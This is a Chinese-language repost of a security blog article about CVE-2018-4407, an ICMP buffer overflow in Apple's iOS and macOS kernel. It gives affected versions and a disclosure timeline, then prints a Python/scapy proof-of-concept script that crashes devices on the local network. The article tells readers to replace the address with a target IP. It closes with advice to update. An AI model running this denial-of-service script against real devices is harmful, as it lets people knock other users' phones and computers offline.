专栏首页HACK学习最新IOS缓冲区溢出漏洞

最新IOS缓冲区溢出漏洞

视频观看:

影响版本

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

时间线

2018-08-09:私下向product-security@apple.com披露。包括概念验证漏洞利用。

2018-08-09:报告由product-security@apple.com承认。

2018-08-20:product-security@apple.com让我向他们发送确切的macOS版本号和恐慌日志。

2018-08-20:将所需信息返回至product-security@apple.com。还向他们发送了一个略微改进的漏洞PoC版本。

2018-08-22:product-security@apple.com确认该问题已在macOS Mojave和iOS 12的测试版中得到修复。但是,他们还表示他们“正在调查在其他平台上解决此问题”并且他们将直到2018年11月才公布此问题。

2018-09-17:Apple发布iOS 12。该漏洞已得到修复。

2018-09-24:macOS Mojave由Apple发布。该漏洞已得到修复。

2018-10-30:泄漏漏洞。

poc代码:

# CVE-2018-4407 ICMP DOS
# https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407
# from https://twitter.com/ihackbanme
 import sys
try:
  from scapy.all import *
except Exception as e:
  print ("[*] You need install scapy first:\n[*] sudo pip install scapy ")
 if __name__ == '__main__':
  try:
    check_ip = sys.argv[1]
        print ("[*] !!!!!!Dangerous operation!!!!!!")
    print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)
    for i in range(8,20):
        send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))
    print ("[*] Check Over!! ")
  except Exception as e:
    print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

该poc脚本需要安装scapy模块以及python的运行环境

复现时把127.0.0.1改成同网段内目标机器的ip地址即可

Windows下运行该POC需要安装winpcap哦

下载地址:https://www.winpcap.org/

建议:

将自己的苹果设备更新至IOS12最新版本。版本低的小伙伴暂时别使用公共wifi和免费wifi,从而避免自己受到此类攻击.

原文地址

https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

本文分享自微信公众号 - HACK学习呀(Hacker1961X),作者:HACK学习

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2018-11-02

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 干货 | Shellcode免杀总结<一>

    自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。

    HACK学习
  • Windows安全应急--多种安全工具的介绍

    AutoRuns是一款项目管理工具,它可以查看“资源管理器”,“IE浏览器”,“计划任务”,“驱动等等”,

    HACK学习
  • Fckeditor上传各版本绕过 | 内含彩蛋

    链接:https://pan.baidu.com/s/1ztQvyXZqq1oyYBDoXGT_Dw

    HACK学习
  • 讲讲你不知道的窗口函数

    我们都知道 SQL 中的聚合函数,聚合函数顾名思义就是聚集合并的意思,是对某个范围内的数值进行聚合,聚合后的结果是一个值或是各个类别对应的值。如下所示:

    张俊红
  • 2018年最值得关注的15大技术趋势

    ? 本文转自36氪 通常情况下,技术趋势是很难准确预测的,因为预测未来本身就极其困难。但是我们还是可以从过往的一些显著数据指标来推测新的一年里科技行业的发展趋...

    CDA数据分析师
  • 团体程序设计天梯赛-练习集 L1-052 2018我们要赢

    2018年天梯赛的注册邀请码是“2018wmyy”,意思就是“2018我们要赢”。本题就请你用汉语拼音输出这句话。

    C you again 的博客
  • 2018年最值得关注的15大技术趋势

    通常情况下,技术趋势是很难准确预测的,因为预测未来本身就极其困难。但是我们还是可以从过往的一些显著数据指标来推测新的一年里科技行业的发展趋势。

    华章科技
  • 盘点 2018 年自然语言处理 10 个激动人心的想法

    这篇文章翻译自 KDnuggets, 作者: Sebastian Ruder, 是 insight_centre 的 NLP PhD,aylien 的研究员

    杨熹
  • Gartner 10大预测:The Future Is a Digital Thing(30PPT)

    大数据文摘
  • 2018年十大科技趋势:AI、区块链、生物识别引领新“风口”

    (1)AI导入加速边缘运算需求与云端数据分析 过往云端运算被用来进行资料运算与后续分析处理,但对于低延迟、实时性的需求逐渐升起,传统云端运算架构反而略显...

    BestSDK

扫码关注云+社区

领取腾讯云代金券